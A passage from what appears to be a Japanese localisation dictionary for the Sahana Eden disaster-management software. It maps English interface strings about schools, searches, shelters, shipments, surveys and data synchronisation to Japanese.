'School assistance received/expected': '学校用支援品を受領済み/受領予定',
'School assistance': '学校の援助',
'School attendance': '学校へ出席者',
'School destroyed': '校舎全壊',
'School heavily damaged': '校舎の深刻な損壊',
'School tents received': '仮校舎用テントを受領',
'School tents, source': '仮校舎用テント、送付元',
'School used for other purpose': '校舎を他目的で利用中',
'School': '学校',
'School/studying': '学校/勉強',
'Schools': '学校',
'Search & List Bin Types': 'Bin Typeを検索して一覧表示',
'Search & List Bins': 'Binsを検索して一覧表示',
'Search & List Catalog': 'カタログを検索して一覧表示',
'Search & List Category': 'カテゴリを検索して一覧表示',
'Search & List Items': '救援物資を検索して一覧表示',
'Search & List Locations': 'ロケーションを検索して一覧表示',
'Search & List Site': 'Siteを検索して一覧表示',
'Search & List Sub-Category': 'サブカテゴリを検索して一覧表示',
'Search & List Unit': '単位を検索して一覧表示',
'Search Activities': '支援活動の検索',
'Search Activity Report': '支援活動レポートの検索',
'Search Addresses': '住所を検索',
'Search Aid Requests': '援助要請を検索',
'Search Alternative Items': 'その他のアイテムを検索',
'Search Assessment Summaries': 'アセスメントの要約を検索',
'Search Assessments': 'アセスメントを検索',
'Search Asset Assignments': '資産割り当ての検索',
'Search Assets': '資産の検索',
'Search Baseline Type': 'Baseline Typeを検索',
'Search Baselines': '基準値の検索',
'Search Brands': '銘柄を検索',
'Search Budgets': '予算を検索',
'Search Bundles': 'Bundleを検索',
'Search Catalog Items': '救援物資カタログを検索',
'Search Category<>Sub-Category<>Catalog Relation': 'Category<>Sub-Category<>Catalog関係の検索',
'Search Checklists': 'チェックリストを検索',
'Search Cluster Subsectors': 'クラスタのサブセクタを検索',
'Search Clusters': 'クラスタを検索',
'Search Commitment Items': 'コミットされた救援物資の検索',
'Search Commitments': 'コミットの検索',
'Search Configs': '設定を検索',
'Search Contact Information': '連絡先情報を検索',
'Search Contacts': '連絡先を検索',
'Search Credentials': '証明書の検索',
'Search Distribution Items': '配給物資を検索',
'Search Distributions': '配給所を検索',
'Search Documents': 'ドキュメントを検索',
'Search Donors': '資金提供組織の検索',
'Search Existing Locations': '既存のロケーションを検索する',
'Search Feature Layers': 'Feature Layersの検索',
'Search Flood Reports': '洪水レポートの検索',
'Search Geonames': 'Geonamesの検索',
'Search Groups': 'グループの検索',
'Search Hospitals': '病院情報の検索',
'Search Identity': 'ID情報の検索',
'Search Images': '画像の検索',
'Search Impact Type': '被害の種類を検索',
'Search Impacts': '影響の検索',
'Search Incident Reports': 'インシデントレポートを検索',
'Search Incidents': 'インシデントの検索',
'Search Inventory Items': '備蓄物資を検索',
'Search Inventory Stores': '物資集積地点の検索',
'Search Item Catalog Category(s)': 'アイテムカタログカテゴリの検索',
'Search Item Catalog(s)': '救援物資カタログの検索',
'Search Item Categories': '救援物資カテゴリを検索',
'Search Item Packs': '物資のパックを検索',
'Search Item Sub-Category(s)': 'アイテムサブカテゴリの検索',
'Search Items': 'アイテムの検索',
'Search Keys': 'Keyの検索',
'Search Kits': 'Kitsの検索',
'Search Layers': 'レイヤの検索',
'Search Level 1 Assessments': 'レベル1アセスメントの検索',
'Search Level 2 Assessments': 'レベル2のアセスメントを検索',
'Search Locations': 'ロケーションの検索',
'Search Log Entry': 'ログエントリの検索',
'Search Map Profiles': '地図設定の検索',
'Search Markers': 'マーカーの検索',
'Search Members': 'メンバーの検索',
'Search Membership': 'メンバシップの検索',
'Search Memberships': 'メンバシップの検索',
'Search Metadata': 'メタデータの検索',
'Search Need Type': '需要タイプの検索',
'Search Needs': '必要な物資を検索',
'Search Notes': '追加情報を検索',
'Search Offices': 'オフィスの検索',
'Search Organizations': '団体の検索',
'Search Peer': '同期先を検索',
'Search Peers': 'データ同期先を検索',
'Search Personal Effects': 'Personal Effectsの検索',
'Search Persons': '人物情報の検索',
'Search Photos': '写真の検索',
'Search Positions': 'Positionsの検索',
'Search Problems': '問題の検索',
'Search Projections': '地図投影法の検索',
'Search Projects': 'プロジェクトの検索',
'Search Rapid Assessments': '被災地の現況アセスメントを検索',
'Search Received Items': '受領済み救援物資の検索',
'Search Received Shipments': '受信済みの出荷の検索',
'Search Records': 'レコードの検索',
'Search Recovery Reports': '遺体回収レポートを検索',
'Search Registations': '登録情報の検索',
'Search Registration Request': '登録要請を検索',
'Search Report': 'レポートの検索',
'Search Reports': 'レポートの検索',
'Search Request Items': '物資の要請を検索',
'Search Request': '支援要請の検索',
'Search Requested Items': '支援要請されている物資を検索',
'Search Requests': '支援要請の検索',
'Search Resources': 'リソースの検索',
'Search Responses': '検索の応答',
'Search Rivers': '河川を検索',
'Search Roles': '役割の検索',
'Search Sections': 'セクションの検索',
'Search Sectors': '活動分野を検索',
'Search Sent Items': '送付した物資を検索',
'Search Sent Shipments': '送信した出荷の検索',
'Search Service Profiles': 'サービスプロファイルの検索',
'Search Settings': '設定の検索',
'Search Shelter Services': '避難所での提供サービスを検索',
'Search Shelter Types': '避難所タイプの検索',
'Search Shelters': '避難所の検索',
'Search Shipment Transit Logs': '輸送履歴の検索',
'Search Shipment/Way Bills': '輸送費/渡航費の検索',
'Search Shipment<>Item Relation': '輸送と救援物資の関係性の検索',
'Search Site(s)': 'Siteの検索',
'Search Skill Types': 'スキルタイプの検索',
'Search Skills': 'スキルを検索',
'Search Solutions': '解決案の検索',
'Search Staff Types': 'スタッフタイプの検索',
'Search Staff': 'スタッフの検索',
'Search Status': '状態の検索',
'Search Storage Bin Type(s)': 'Storage Bin Typeの検索',
'Search Storage Bin(s)': 'Storage Bin(s)の検索',
'Search Storage Location(s)': '備蓄地点の検索',
'Search Subscriptions': '寄付申し込みを検索',
'Search Support Requests': '支援要求の検索',
'Search Tasks': 'タスクの検索',
'Search Teams': 'チームの検索',
'Search Themes': 'テーマの検索',
'Search Tickets': 'チケットの検索',
'Search Tracks': '追跡情報の検索',
'Search Twitter Tags': 'Twitterのタグを検索',
'Search Units': '単位の検索',
'Search Users': 'ユーザの検索',
'Search Volunteer Registrations': 'ボランティア登録の検索',
'Search Volunteers': 'ボランティアの検索',
'Search Warehouse Items': '倉庫の物資を検索',
'Search Warehouses': 'Warehousesの検索',
'Search and Edit Group': 'グループを検索して編集',
'Search and Edit Individual': '人物情報を検索して個別に編集',
'Search by ID Tag': 'IDタグで検索',
'Search for Items': '物資の検索',
'Search for a Hospital': '病院を探す',
'Search for a Location': '検索地域を指定します',
'Search for a Person': '人物を探す',
'Search for a Project': 'プロジェクトを探す',
'Search for a Request': '支援要請の検索',
'Search for a shipment received between these dates': 'ある期間内に受け取られた輸送を検索する',
'Search for an item by category.': 'カテゴリで物資を検索',
'Search for an item by text.': 'テキストで項目を検索',
'Search here for a person record in order to:': '人物情報を検索することで、以下の事柄を行うことができます。',
'Search messages': 'メッセージの検索',
'Search': '検索',
'Searching for different groups and individuals': '他のグループと個人を探す',
'Secondary Server (Optional)': 'セカンダリサーバ(オプション)',
'Seconds must be a number between 0 and 60': '秒には0-60の間の数字を記入してください',
'Seconds must be a number greater than 0 and less than 60': '秒は0から60の間で入力してください',
'Section Details': 'Sectionの詳細',
'Section deleted': 'Sectionを削除しました',
'Section updated': 'セクションを更新しました',
'Sections': 'セクション',
'Sector Details': '活動分野の詳細',
'Sector added': '活動分野を追加しました',
'Sector deleted': '活動分野を削除しました',
'Sector updated': '活動分野を更新しました',
'Sector': '活動分野',
'Sectors': '活動分野',
'Security Policy': 'セキュリティポリシー',
'Security Status': 'セキュリティステータス',
'Security problems': 'セキュリティーの問題',
'See unassigned recovery requests': 'まだ割り当てられていない遺体回収要請を見る',
'Seen': '発見情報あり',
'Select 2 potential locations from the dropdowns.': '候補地を2つ、ドロップダウンから選択します。',
'Select Items from the Request': '支援要請を基にアイテムを選択する',
'Select Items from this Inventory': '備蓄中の物資から選択',
'Select Language': '言語選択',
'Select Organization': '団体の選択',
'Select Photos': '写真の選択',
'Select a location': 'ロケーションを選択',
'Select a question from the list': 'リストから質問を選択してください',
'Select a range for the number of total beds': 'ベッド総数の範囲を選択',
'Select all that apply': '該当する項目を全て選択',
'Select an Organization to see a list of offices': '団体を選択すると、所属するオフィスが表示されます',
'Select an existing Location': '既に登録してあるロケーションを選択してください',
'Select the Cluster Layers for Assessments and Activities to analyse the Gaps:': 'アセスメントと支援活動のギャップを解析するクラスタの層を選択:',
'Select the overlays for Assessments and Activities relating to each Need to identify the gap.': 'オーバーレイを指定し、適切なアセスメントと支援活動を表示させてニーズを明確にします。',
'Select the person assigned to this role for this project.': 'この人物に、プロジェクト内の権限を担当させます。',
'Select the person associated with this scenario.': 'このタスクに関連する人物を選択してください。',
'Select to see a list of subdivisions.': '項目を選択すると、より細かい分類を選択できます。',
'Select to show this configuration in the Regions menu.': '範囲メニューで表示する構成を選択して下さい',
'Select': '選択',
'Selects whether to use a Modem, Tropo or other Gateway for sending out SMS': 'SMS送信時に、モデム、Tropoまたはゲートウェイのどちらを使用するかを選択',
'Selects whether to use the gateway or the Modem for sending out SMS': 'SMS送信時、モデムとゲートウェイのどちらを使用するか選択',
'Self Registration': '本人による登録',
'Self-registration': '本人による登録',
'Send Alerts using Email &/or SMS': '電子メールまたはSMSを使用してアラートを送信',
'Send Items': '物資を送付',
'Send Mail': 'メール送信',
'Send Message': 'メッセージを送る',
'Send Notification': '通知を送信',
'Send Shipment': '輸送を開始する',
'Send from %s': '依頼主( %s )',
'Send message': 'メッセージ送信',
'Send new message': '新規メッセージ送信',
'Send': '物資送付',
'Sends & Receives Alerts via Email & SMS': '電子メール/SMS 経由でアラート送信/受信',
'Senior (50+)': '高齢者 (50+)',
'Sensitivity': '感度',
'Sent Item Details': '送付した物資の詳細',
'Sent Item deleted': '輸送済み物資を削除しました',
'Sent Item updated': '送付した救援物資を更新しました',
'Sent Shipment Details': '送付物資の詳細',
'Sent Shipment canceled and items returned to Inventory': '送付処理した輸送がキャンセルされ、物資は倉庫に戻りました',
'Sent Shipment canceled': '輸送開始をキャンセルしました',
'Sent Shipment updated': '送信した物資が更新されました',
'Sent Shipments': '物資を送付しました',
'Sent': '送信',
'Separate latrines for women and men': 'トイレは男女別である',
'Separated children, caregiving arrangements': '親と離れた子供だちのための保育手配',
'Seraiki': 'セライキ',
'Serial Number': 'シリアルナンバー',
'Series': 'シリーズ',
'Server': 'サーバ',
'Service Catalog': 'サービスカタログ',
'Service or Facility': 'サービス、または施設',
'Service profile added': 'サービスプロファイルを追加しました',
'Service profile deleted': 'サービスプロファイルを削除しました',
'Service profile updated': 'サービスプロファイルを更新しました',
'Service': 'サービス',
'Services Available': '利用可能なサービス',
'Services': 'サービス',
'Setting Details': '設定の詳細',
'Setting added': '設定を追加しました',
'Setting deleted': '設定を削除しました',
'Setting updated': '設定を更新しました',
'Settings updated': '設定を更新しました',
'Settings were reset because authenticating with Twitter failed': 'Twitterの認証に失敗したため、設定をクリアします',
'Settings': '設定',
'Severe': '深刻',
'Severity': '深刻度',
'Severity:': '深刻度:',
'Share a common Marker (unless over-ridden at the Feature level)': 'マーカーの共有 (機能レイヤで上書きされない限り)',
'Shelter & Essential NFIs': '避難所/生活用品',
'Shelter Details': '避難所の詳細',
'Shelter Name': '避難所名称',
'Shelter Registry': '避難所登録',
'Shelter Service Details': '避難所サービスの詳細',
'Shelter Service added': '避難所サービスを追加しました',
'Shelter Service deleted': '避難所サービスを削除しました',
'Shelter Service updated': '避難所サービスを更新しました',
'Shelter Service': '避難所サービス',
'Shelter Services': '避難所サービス',
'Shelter Type Details': '避難所タイプの詳細',
'Shelter Type added': '避難所タイプを追加しました',
'Shelter Type deleted': '避難所タイプを削除しました',
'Shelter Type updated': '避難所サービスを更新しました',
'Shelter Type': '避難所タイプ',
'Shelter Types and Services': '避難所のタイプとサービス',
'Shelter Types': '避難所タイプ',
'Shelter added': '避難所を追加しました',
'Shelter deleted': '避難所を削除しました',
'Shelter updated': '避難所を更新しました',
'Shelter': '避難所',
'Shelter/NFI Assistance': '避難所 / 生活用品支援',
'Shelter/NFI assistance received/expected': '避難所 / 生活必需品の支援を受領済み、あるいは受領予定',
'Shelters': '避難所',
'Shipment Created': '輸送が作成されました',
'Shipment Details': '輸送の詳細',
'Shipment Items received by Inventory': '物資備蓄地点から送付された救援物資',
'Shipment Items sent from Inventory': '備蓄物資から輸送を行いました',
'Shipment Items': '救援物資の輸送',
'Shipment Transit Log Details': '輸送履歴の詳細',
'Shipment Transit Log added': '輸送履歴を追加しました',
'Shipment Transit Log deleted': '輸送履歴を削除しました',
'Shipment Transit Log updated': '輸送履歴を更新しました',
'Shipment Transit Logs': '輸送履歴',
'Shipment/Way Bill added': '輸送/移動費を追加しました',
'Shipment/Way Bills Details': '輸送/移動費の詳細',
'Shipment/Way Bills deleted': '輸送/移動費を削除しました',
'Shipment/Way Bills updated': '輸送/移動費を更新しました',
'Shipment/Way Bills': '輸送/移動費',
'Shipment<>Item Relation added': '輸送<>物資間の関係を追加しました',
'Shipment<>Item Relation deleted': '輸送<>アイテム間の関係を削除しました',
'Shipment<>Item Relation updated': '輸送<>物資間の関係を更新しました',
'Shipment<>Item Relations Details': '輸送<>物資間の関係詳細',
'Shipment<>Item Relations': '輸送<>物資間の関係',
'Shipments To': '輸送先',
'Shipments': '輸送',
'Shooting': '銃撃',
'Short Assessment': '簡易評価',
'Short Description': '概要',
'Show Checklist': 'チェックリストを表示',
'Show Details': '詳細を表示',
'Show Map': '地図の表示',
'Show Region in Menu?': '地域をメニューで表示しますか?',
'Show on map': '地図上に表示',
'Sign-up as a volunteer': 'ボランティアとして登録する',
'Sign-up for Account': 'アカウント登録',
'Sign-up succesful - you should hear from us soon!': '登録できました。すぐに連絡が送られます。',
'Sindhi': 'シンド語',
'Site Address': 'サイトの住所',
'Site Administration': 'このサイト自体の管理',
'Site Description': 'サイトの説明',
'Site Details': 'Siteの詳細',
'Site ID': 'サイトID',
'Site Location Description': 'サイト ロケーションの説明',
'Site Location Name': 'サイトロケーション名',
'Site Manager': 'Site 管理者',
'Site Name': 'Site の名前',
'Site added': 'サイトを追加しました',
'Site deleted': 'サイトを削除しました',
'Site updated': 'サイトを更新しました',
'Site': 'サイト',
'Site/Warehouse': 'サイト/倉庫',
'Sites': 'サイト',
'Situation Awareness & Geospatial Analysis': '広域情報の取得や、地理情報の分析を行ないます',
'Sketch': 'スケッチ',
'Skill Details': 'スキルの詳細',
'Skill Status': 'スキル状況',
'Skill Type Details': 'スキルタイプの詳細',
'Skill Type added': 'スキルタイプを追加しました',
'Skill Type deleted': 'スキルタイプを削除しました',
'Skill Type updated': 'スキルタイプを更新しました',
'Skill Types': 'スキルタイプ',
'Skill added': 'スキルを追加しました',
'Skill deleted': 'スキルを削除しました',
'Skill updated': 'スキルを更新しました',
'Skill': 'スキル',
'Skills': 'スキル',
'Slope failure, debris': '斜面崩壊・崩壊堆積物',
'Small Trade': '小規模取引',
'Smoke': '煙',
'Snapshot Report': 'スナップショットレポート',
'Snapshot': 'スナップショット',
'Snow Fall': '降雪',
'Snow Squall': '豪雪',
'Soil bulging, liquefaction': '土壌隆起・液状化',
'Solid waste': '固形廃棄物',
'Solution Details': '解決案の詳細',
'Solution Item': '解決案項目',
'Solution added': '解決案を追加しました',
'Solution deleted': '解決案を削除しました',
'Solution updated': '解決案を更新しました',
'Solution': '解決案',
'Solutions': '解決案',
'Some': '散見',
'Sorry - the server has a problem, please try again later.': 'すみません、サーバーに問題が発生しています。時間を置いてやり直してください。',
'Sorry that location appears to be outside the area of the Parent.': 'このロケーションは親属性のエリアの外に表示されます。',
'Sorry that location appears to be outside the area supported by this deployment.': 'すいません、この位置は、このデプロイメントでサポートされている領域の外です。',
'Sorry, I could not understand your request': '残念ながら、リクエストが理解できませんでした。',
'Sorry, only users with the MapAdmin role are allowed to create location groups.': '申し訳ありませんが、 MapAdmin 権限を持つユーザだけがロケーションのグループを作れます',
'Sorry, only users with the MapAdmin role are allowed to edit these locations': '申し訳ありませんが、ロケーションの編集を行うにはMapAdmin権限を持ったユーザである必要があります。',
'Sorry, something went wrong.': 'すいません、何か問題が発生しています。',
'Sorry, that page is forbidden for some reason.': 'すいません、都合により、このページは閲覧禁止です。',
'Sorry, that service is temporary unavailable.': 'すいません、このサービスは一時的に利用不可となっています。',
'Sorry, there are no addresses to display': 'すいません、表示する住所がありません',
'Source ID': '情報元ID',
'Source Time': '情報ソース入手時刻',
'Source Type': '情報ソース種別',
'Source': '情報元',
'Sources of income': '収入源',
'Space Debris': '宇宙廃棄物',
'Spanish': 'スペイン語',
'Special Ice': '特別な氷',
'Special Marine': '特別海上',
'Special needs': '特別な要求',
'Specialized Hospital': '専門病院',
'Specific Area (e.g. Building/Room) within the Location that this Person/Group is seen.': 'ある人々やグループが見られるロケーションの中の特別な場所 (建物、部屋等)',
'Specific Location': '特定のロケーション',
'Specific locations need to have a parent of level': 'ロケーションを指定するには、そのロケーションの親属性指定が必要です',
'Specify a descriptive title for the image.': '画像の説明として一言タイトルをつけてください。',
'Specify the bed type of this unit.': 'この施設にある寝具の種別を指定してください',
'Specify the minimum sustainability in weeks or days.': '最短で何週間、あるいは何日以内に枯渇の可能性があるかを記載してください',
'Specify the number of available sets': '利用可能なセットの個数を入力してください',
'Specify the number of available units (adult doses)': '(成人が使用するとして)使用可能な個数を入力してください',
'Specify the number of available units (litres) of Ringer-Lactate or equivalent solutions': '使用可能な乳酸リンゲル液あるいは同等品のリッター数を入力してください',
'Specify the number of sets needed per 24h': '24時間ごとに必要なセットの数を指定する',
'Specify the number of units (adult doses) needed per 24h': '(成人が使用するとして)24時間ごとに必要な個数を入力してください',
'Specify the number of units (litres) of Ringer-Lactate or equivalent solutions needed per 24h': '24時間ごとに必要な乳酸リンゲル液あるいは同等品のリッター数を入力してください',
'Spherical Mercator?': '球面メルカトル?',
'Spreadsheet Importer': 'スプレッドシートの取り込み',
'Spreadsheet uploaded': 'スプレッドシートがアップロードされました',
'Spring': '湧き水',
'Squall': 'スコール',
'Staff 2': 'スタッフ 2',
'Staff Details': 'スタッフの詳細',
'Staff Type Details': 'スタッフタイプの詳細',
'Staff Type added': 'スタッフタイプを追加しました',
'Staff Type deleted': 'スタッフタイプを削除しました',
'Staff Type updated': 'スタッフタイプを更新しました',
'Staff Types': 'スタッフ分類',
'Staff added': 'スタッフを追加しました',
'Staff deleted': 'スタッフを削除しました',
'Staff present and caring for residents': '上記施設にスタッフが配置され、ケアを行っている',
'Staff updated': 'スタッフを更新しました',
'Staff': 'スタッフ',
'Staffing': 'スタッフ配備',
'Stairs': '階段',
'Start date and end date should have valid date values': '開始日と終了日は正しい値である必要があります',
'Start date': '開始日',
'Start of Period': '開始期間',
'Stationery': '文房具',
'Status Report': 'ステータスレポート',
'Status added': '状況が追加されました',
'Status deleted': 'ステータスを削除しました',
'Status of clinical operation of the facility.': '施設で行われている診療の状況を記載してください。',
'Status of general operation of the facility.': '施設の運用状況情報を記載してください。',
'Status of morgue capacity.': '死体安置所の収容状況です。',
'Status of operations of the emergency department of this hospital.': 'この病院の緊急手術室の状態です。',
'Status of security procedures/access restrictions in the hospital.': '病院のアクセス制限/セキュリティ手順の状態。',
'Status of the operating rooms of this hospital.': 'この病院の手術室の状態。',
'Status updated': '状況を更新しました',
'Status': 'ステータス',
'Steel frame': '鉄骨',
'Storage Bin Details': '物資保管場所の詳細',
'Storage Bin Number': 'Storage Bin番号',
'Storage Bin Type Details': '物資保管タイプの詳細',
'Storage Bin Type added': '物資保管タイプを追加しました',
'Storage Bin Type deleted': 'Storage Binタイプを削除しました',
'Storage Bin Type updated': 'Storage Binタイプを更新しました',
'Storage Bin Type': 'Storage Binタイプ',
'Storage Bin Types': '収納箱のタイプ',
'Storage Bin added': 'Storage Binを追加しました',
'Storage Bin deleted': 'Storage Bin を削除しました',
'Storage Bin updated': 'Storage Bin を更新しました',
'Storage Bin': '物資貯蔵容器',
'Storage Bins': '物資保管場所',
'Storage Location Details': '備蓄地点の詳細',
'Storage Location ID': '備蓄地点ID',
'Storage Location Name': '備蓄地点名称',
'Storage Location added': '備蓄地点を追加しました',
'Storage Location deleted': '備蓄地点を削除しました',
'Storage Location updated': '備蓄地点を更新しました',
'Storage Location': '備蓄地点',
'Storage Locations': '備蓄地点',
'Store spreadsheets in the Eden database': 'Edenのデータベースにスプレッドシートを格納',
'Storeys at and above ground level': '階層、あるいは地面より上部',
'Storm Force Wind': '嵐の風の強さ',
'Storm Surge': '高潮',
'Stowaway': '密航者',
'Street (continued)': '住所 (続き)',
'Street Address': '住所',
'Street': 'ストリート',
'Strong Wind': '強風',
'Structural Hazards': '構造破壊',
'Structural': '構造的な',
'Sub Category': 'サブカテゴリ',
'Sub-type': 'サブタイプ',
'Subject': '件名',
'Submission successful - please wait': '送信に成功しました。しばらくお待ちください',
'Submission successful - please wait...': '送信に成功しました。しばらくお待ちください',
'Submit New (full form)': '(完全なフォームで)新しく投稿する',
'Submit New (triage)': '新しい (トリアージ) を追加',
'Submit New': '新規登録',
'Submit a request for recovery': '遺体回収要請を作成する',
'Submit new Level 1 assessment (full form)': 'レベル1のアセスメントを投稿する(完全なフォーム)',
'Submit new Level 1 assessment (triage)': '新しいレベル1アセスメント(トリアージ)を追加',
'Submit new Level 2 assessment': '新しいレベル2アセスメントの登録',
'Submit': '送信',
'Subscription Details': '寄付申し込みの詳細',
'Subscription added': '寄付申し込みを追加しました',
'Subscription deleted': '寄付申し込みを削除しました',
'Subscription updated': '寄付申し込みを更新しました',
'Subscriptions': '寄付申し込み',
'Subsistence Cost': '生存コスト',
'Suburb': '郊外',
'Sufficient care/assistance for chronically ill': '慢性疾患罹患者への十分なケア / 介護がある',
'Suggest not changing this field unless you know what you are doing.': 'よくわからない場合は、この項目を変更しないでください。',
'Summary by Administration Level': '管理レベルの概要',
'Summary': '要約',
'Sunday': '日曜',
'Supervisor': '管理権限を追加',
'Supplies': '支給品',
'Support Request': '支援要請',
'Support Requests': '支援の要請',
'Supports the decision making of large groups of Crisis Management Experts by helping the groups create ranked list.': '危機管理の専門グループの助言を取り入れることで、救援活動の優先順位を作成しやすくします。',
'Sure you want to delete this object?': 'このオブジェクトを削除してもよろしいですか?',
'Surgery': '外科',
'Survey Answer Details': '調査回答詳細',
'Survey Answer added': '調査の回答を追加しました',
'Survey Answer deleted': '調査の回答を削除しました',
'Survey Answer updated': '調査回答を更新しました',
'Survey Answer': '調査回答',
'Survey Module': '調査モジュール',
'Survey Name': 'Survey 名',
'Survey Question Details': '調査項目の詳細',
'Survey Question Display Name': 'フィードバックの質問の表示名',
'Survey Question added': '調査の質問を追加しました',
'Survey Question deleted': '調査の質問を削除しました',
'Survey Question updated': 'Survey Questionを更新しました',
'Survey Question': '調査の質問',
'Survey Section Details': 'フィードバック項目の詳細',
'Survey Section Display Name': '調査項目の表示名',
'Survey Section added': '調査項目を追加しました',
'Survey Section deleted': 'フィードバック項目を削除しました',
'Survey Section updated': 'サーベイセクションを更新しました',
'Survey Section': '調査項目',
'Survey Series Details': 'Survey Seriesの詳細',
'Survey Series Name': 'フィードバックシリーズ名',
'Survey Series added': '一連の調査を追加しました',
'Survey Series deleted': '一連の調査を削除しました',
'Survey Series updated': '連続調査を更新しました',
'Survey Series': '一連の調査',
'Survey Template Details': '調査テンプレートの詳細',
'Survey Template added': 'Surveyテンプレートを追加しました',
'Survey Template deleted': '調査テンプレートを削除しました',
'Survey Template updated': '調査のテンプレートを更新しました',
'Survey Template': '調査テンプレート',
'Survey Templates': '調査のテンプレート',
'Switch this on to use individual CSS/Javascript files for diagnostics during development.': '開発時にこのスイッチをONにすることで、CSS/Javascriptファイルの診断を行なえます。',
'Symbology': 'コード',
'Sync Conflicts': 'データ同期中に競合が発生しました',
'Sync History': 'データ同期履歴',
'Sync Now': 'データ同期中',
'Sync Partners are instances or peers (SahanaEden, SahanaAgasti, Ushahidi, etc.) that you want to sync information with. Click on the link on the right to go the page where you can add sync partners, search for sync partners and modify them.': 'データ同期先とは、情報の同期を行うインスタンスやピアのことを指します。(Sahana EdenやSahanaAgasti、Ushahidiなどと同期可能です) 同期先の登録や検索、登録情報の変更を行う際は、リンクをクリックしてページを表示してください。',
'Sync Partners': 'データ同期パートナー',
'Sync Pools': 'プールの同期',
'Sync Schedule': 'データ同期スケジュール',
'Sync Settings': 'データ同期設定',
'Sync process already started on ': 'データ同期プロセスは既に開始しています',
'Synchronisation History': 'データ同期履歴',
'Synchronisation': '同期',
'Synchronization Conflicts': '同期のコンフリクト',
'Synchronization Details': 'データ同期の詳細',
'Synchronization History': 'データ同期履歴',
'Synchronization Peers': 'データ同期先',
'Synchronization Settings': 'データ同期設定',
'Synchronization allows you to share data that you have with others and update your own database with latest data from other peers. This page provides you with information about how to use the synchronization features of Sahana Eden': 'データ同期を使用すると、他の端末とデータを共有し、自身のデータを最新の状態に更新することができます。このページには、SahanaEdenにおいてデータ同期を行う方法が記載されています。',
'Synchronization not configured.': 'データ同期が設定されていません',
'Synchronization settings updated': 'データ同期設定を更新しました',
'Synchronization': 'データ同期',
'Syncronisation History': 'データ同期履歴',
'Syncronisation Schedules': 'データ同期スケジュール',
'System allows the General Public to Report Incidents & have these Tracked.': 'システムを使うことで、一般市民によるインシデントの報告、および報告されたインシデントの追跡を行うことができます。',
'System allows the tracking & discovery of Items stored in Locations.': 'システムにより、物資がどこで保持されているかを追跡、明確化することができます。',
'System is a central online repository where all relief organizations, relief workers, government agents and camp sites for displaced personnel can coordinate the supply of aid with their demand. It allows users to allocate the available resources to fulfill the demands effectively and efficiently.': 'このシステムは、支援団体、個々の支援者、政府職員、そして避難所に移動した人々の間で、援助の需要と供給の調整を図るための、オンラインの中央データベースです。このシステムを用いて、利用可能な資源を、需要を満たすように、有効かつ効率的に割り当てることができます。',
'System keeps track of all Volunteers working in the disaster region. It captures not only the places where they are active, but also captures information on the range of services they are providing in each area.': 'この仕組みでは、災害地域の全てのボランティア情報を提供します。ボランティアの活動場所に加え、そこで提供する支援内容も提供します。',
'TMS Layers': 'TMSレイヤ',
'Table name': 'テーブル名',
'Tags': 'タグ',
'Take shelter in place or per <instruction>': '場所や<instruction>ごとに避難してください',
'Task Details': 'タスクの詳細',
'Task List': 'タスク一覧',
'Task Status': 'タスクの状況',
'Task added': 'タスクを追加しました',
'Task deleted': 'タスクを削除しました',
'Task status': 'タスク状況',
'Task updated': 'タスクを更新しました',
'Tasks': 'タスク',
'Team Description': 'チーム概要',
'Team Details': 'チームの詳細',
'Team Head': 'チーム代表者',
'Team Id': 'チームID',
'Team Leader': 'チームリーダー',
'Team Member added': 'チームメンバーを追加しました',
'Team Members': 'チームメンバー',
'Team Name': 'チーム名',
'Team Type': 'チームタイプ',
'Team added': 'チームを追加しました',
'Team deleted': 'チームを削除しました',
'Team updated': 'チームを更新しました',
'Team': 'チーム',
'Teams': 'チーム',
'Technical testing only, all recipients disregard': '技術検証のみで、すべての受取人は無視されます',
'Telecommunications': '通信・情報',
'Telephone': '電話',
'Telephony': '電話',
'Temp folder %s not writable - unable to apply theme!': '一時フォルダ%sが書き込み不可になっています。テーマを適用できません。',
'Template file %s not readable - unable to apply theme!': 'テンプレートファイル %s が読み込み不可になっています。テーマを適用できません。',
'Templates': 'テンプレート',
'Term for the fifth-level within-country administrative division (e.g. a voting or postcode subdivision). This level is not often used.': '国内における第五段階管理部門を示す用語(例: 郵便番号の下位部分)。このレベルは通常使われません。',
'Term for the fourth-level within-country administrative division (e.g. Village, Neighborhood or Precinct).': '国内で第4の行政区域を示す用語 (例えば村、地区)',
'Term for the primary within-country administrative division (e.g. State or Province).': '国内で最大の行政区域を示す用語 (例えば州や都道府県)',
'Term for the secondary within-country administrative division (e.g. District).': '国内で二番目の管理部門の用語 (例: 区)',
'Term for the third-level within-country administrative division (e.g. City or Town).': '国内で三番目の管理部門を示す用語 (例: 市や町)',
'Term for the top-level administrative division (typically Country).': '最上位の統制区域を示す用語 (一般的には国)',
'Territorial Authority': '地方機関',
'Terrorism': 'テロリズム',
'Tertiary Server (Optional)': '三番目のサーバ(オプション)',
'Test Results': 'テスト結果',
'Text Color for Text blocks': 'テキストブロックのテキスト色',
'Text before each Text Field (One per line)': 'テキストフィールドの前のテキスト (一行に一つ)',
'Text in Message': 'メッセージのテキスト',
'Text in Message: ': 'メッセージのテキスト: ',
'Text': 'テキスト',
'Thanks for your assistance': 'ご協力ありがとうございます',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1 == db.table2.field2" results in a SQL JOIN.': '"query"は"db.table1.field1==\'value\'"のような条件です。SQL JOINの"db.table1.field1 == db.table2.field2"結果のようなものです。',
'The Area which this Site is located within.': 'このサイトが含まれる地域',
'The Assessments module allows field workers to send in assessments. 2 different options are provided here currently:': 'アセスメントモジュールは、被災現場で活動する人々による現状の査定報告を記録することができます。現在は、2種類のオプションが提供されています。',
'The Assessments module allows field workers to send in assessments.': 'アセスメントモジュールは、被災現場で活動する人々による現状の査定報告を記録することができます。',
'The Author of this Document (optional)': 'この文書の作成者氏名(オプション)',
'The Building Asssesments module allows building safety to be assessed, e.g. after an Earthquake.': 'ビルアセスメントモジュールではビルの安全性評価を行います (例:地震の後など)',
'The Current Location of the Person/Group, which can be general (for Reporting) or precise (for displaying on a Map). Enter a few characters to search from available locations.': 'その人物/グループの現在地は報告用の概要レベルの情報あるいは地図上の表示のため正確な情報いずれの場合もあります。場所名の数文字を入力すると、登録済みの場所から検索できます。',
'The District for this Report.': 'このレポートが関連する地区。',
'The Email Address to which approval requests are sent (normally this would be a Group mail rather than an individual). If the field is blank then requests are approved automatically if the domain matches.': '承認依頼が送信されるメールアドレス(通常は個人のメールアドレスではなく、グループのメールアドレス)。この欄が空白の場合、ドメインが一致すれば依頼は自動的に承認されます',
'The Group whose members can edit data in this record.': 'このグループのメンバーは、レコード上のデータを修正することができます。',
